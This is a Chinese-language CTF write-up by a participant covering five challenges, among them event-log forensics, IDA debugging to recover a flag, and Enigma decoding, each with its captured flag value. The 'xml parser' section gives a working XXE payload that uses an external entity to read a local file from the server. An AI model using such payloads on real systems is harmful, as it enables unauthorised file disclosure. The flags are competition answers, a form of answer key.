WRITEUP

林玮琪 WRITEUP

2 ezEvtx

操作内容：

事件查看器打开，左上角菜单栏查看-排序方式-级别，找到特别不一样的这个警告，点开看常规，找到文件confidential.docx

如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：

flag{confidential.docx}

3 FLOWZIP

操作内容：

拖进Ctfnet-a秒了

如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：

flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}

4 ShadowPhases

操作内容：

Ida64打开，左边函数窗口找到main进去，主窗口按f5反编译，

在98行下断点

调试器选择local windows debugger

点绿色箭头运行，随便输入一串字符

停在这里，继续按f5反编译

Str2双击进去，按下a，转化为字符串，得到flag

如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：flag{0fa830e7-b699-4513-8e01-51f35b0f3293}

10.星际xml解析器

操作内容：

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE a [

<!ENTITY file SYSTEM "file:///flag">

]>

<ccc>&file;</ccc>

如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：

flag{c4e540dc-563d-42ca-a541-971eb150fa53}

Enigma

操作内容：

正逆都一样的编解码，参数都没改，直接厨师重新解码套上flag{}，去掉空格，就能得到flag

如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：flag{HELLOCTFERTHISISAMESSAGEFORYOU}